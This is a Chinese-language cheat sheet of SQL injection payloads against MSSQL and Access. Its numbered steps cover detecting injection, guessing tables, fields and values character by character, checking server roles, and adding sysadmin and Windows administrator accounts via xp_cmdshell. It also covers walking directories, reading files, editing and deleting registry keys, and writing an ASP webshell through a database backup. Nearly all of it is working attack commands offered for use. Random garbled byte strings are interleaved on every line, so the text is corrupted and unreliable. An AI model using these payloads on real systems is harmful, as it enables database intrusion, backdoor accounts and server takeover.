1.判断是否有注入;and 1=1 ;and 1=2 �F�']Vg31c
2.初步判断是否是mssql ;and user>0 �=pWpHb�B.
FVG|5�'V^�
3.注入参数是字符'and [查询条件] and ''=' F~a5yW:R=)
O|,+@��qtH
4.搜索时没过滤参数的'and [查询条件] and '%25'=' F�h�n�883�
?>q=Nf^�Q.
5.判断数据库系统 =Cs$�0�aA�
pvy�;L[c��
;and (select count(*) from sysobjects)>0 mssql PGT!HdX#{�
mUr@w*kq|p
;and (select count(*) from msysobjects)>0 access I�>���/`W�
3D\.S���j%
^'Qc�P5�Fv
oD{V_�/pdx
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �A#����1aO
f]T1:�N*t�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 �� g/+M&k$
$$� _��uQf
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 hl}�#b�Z8]
�/G[y
24 Q
9.(1)猜字段的ascii值(access) =i%2/kdi0b
Py�YK�e�o=
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 �0x^$q?
\A
���T<zonx1
(2)猜字段的ascii值(mssql) 7u�5B/�M!
9][Mw[�k�>
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 c}Z,xop<P{
rA*,)I_v@
10.测试权限结构(mssql) A��G}��'
W
ZM;�E�jS�1
�[$[t.���m
ieBW 0�eMi
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- >;xEzc!W3*
r��F~�q"9
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- +�*0�THol-
|&n dQ(!�l
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- A�aTtY���d
O�-T�/H-J`
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- n^&Q�OII@>
R~RY:[�5?w
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��*kyy�''r
8"�8{Nf-"
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- xDADJ>u�2K
�mSQ!<1PM�
;and 1=(select IS_MEMBER('db_owner'));-- �yv�Dz�xu�
4vqu�(w8
L
R<UjhCvx�.
aE{�b65'Dt
11.添加mssql和系统的帐户 �"6�KOql�3
Cc Ni8Wg_
;exec master.dbo.sp_addlogin username;-- sef�!hS0�6
;exec master.dbo.sp_password null,username,password;-- �'�t�)�j��
fE7WLV2�I>
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- 8-?n<h%8E�
dJ24J+9}]j
;exec master.dbo.xp_cmdshell 'net user username password �ixKQh};5/
kIW���Q`)'
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- M!��X@-t#
UO:>^,(�j�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- B�M�&'3K_y
Q ;k_q3���
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- +#B%Y�K|LR
A�5�H[g`�&
!u�O|T'u0a
*c3�o&-ke9
12.(1)遍历目录 9�oq(5�BG,
�cQ+,���F2
;create table dirs(paths varchar(100), id int) ��:He�:Bdk
/=r&9P@Ay<
;insert dirs exec master.dbo.xp_dirtree 'c:\' \��1�7)�=W
n.1a1�Tf��
;and (select top 1 paths from dirs)>0 ��&�R^mpV5
���_��R-#I
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) HKx�rBQr78
L�oCx�o�Ag
�"R�9�kF-
H`i�o|~Q
(2)遍历目录 f���Z
%ZV�
HPCA,*YR`
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- _v�$mGZpGY
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 W\KZF�r�V@
�@��ic��s
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 I���"
�j7
�A,=l9hE'�
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 wK\�S�eX�
3�QR��-��8
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 3K0J�6/�mc
fV5#k@,"�)
1�5s�?QSKj
1g���m{.*G
13.mssql中的存储过程 _%�L3?PpF"
���X@D��3�
xp_regenumvalues 注册表根键, 子键 �
E�;|\?>�
5��
+�
Jy
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �S��v�>�aZ
x�)Th2es\
xp_regread 根键,子键,键值名 @%fk�W"y:�
<�'vM+�L�k
;exec xp_regread ��\Fe5<G'v
zO\�"$8q*�
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 X�0P$r�6 ;
P�CI�C*!�{
xp_regwrite 根键,子键, 值名, 值类型, 值 Lny�A�5�T�
m�76]I�Nq
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �g,W#3b6>j
:-
5Mn3��*
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 d8r�+U�P@#
�\Q)~'P�3
xp_regdeletevalue 根键,子键,值名 /kWWw�y<�
~g,Qwa�A[
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 .�s9Iy��mz
SMy&K[�hJ[
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 LpiLk| 2�i
A�P~!YwL�W
pKJ[e@E�^
SwL�\=nq+~
14.mssql的backup创建webshell E��Xi+��pm
q�_K1L���
use model 2>r���.[��
�@6�Mo_4)O
create table cmd(str image); r\1*N.O3|O
Dx��D0iJ=W
insert into cmd(str) values (''); j>:T�)zhyY
�@]7\.��>)
backup database model to disk='c:\l.asp'; ynd}w�
G�'
o�y'��+n-�
YS~x-5�OE\
}v!6�BU6<Q
15.mssql内置函数 0qZ)$�YKq�
g�[n8N�{�s
;and (select @@version)>0 获得Windows的版本号 �Lr~K3nb�
?t"Pa�wBWE
;and user_name()='dbo' 判断当前系统的连接用户是不是sa 3HiW1�*5�W
lt]U�?VZ �
;and (select user_name())>0 爆当前系统的连接用户 QRj�t.Ry�|
���%In"Kh*
;and (select db_name())>0 得到当前连接的数据库 h=t�Y 5]�8
3$b(i�I< "
�$5o<�M��j
/l`X��J�s�
16.简洁的webshell ?|/}~��nj7
f�:�SF&�t*
use model �r6)1Y`K=9
n"
~*9'���
create table cmd(str image); �%xruPWT:k
&Y�>u2OZ�
insert into cmd(str) values (''); -�$q/7,�os
|{���nI�.>
backup database model to disk='g:\wwwtest\l.asp';
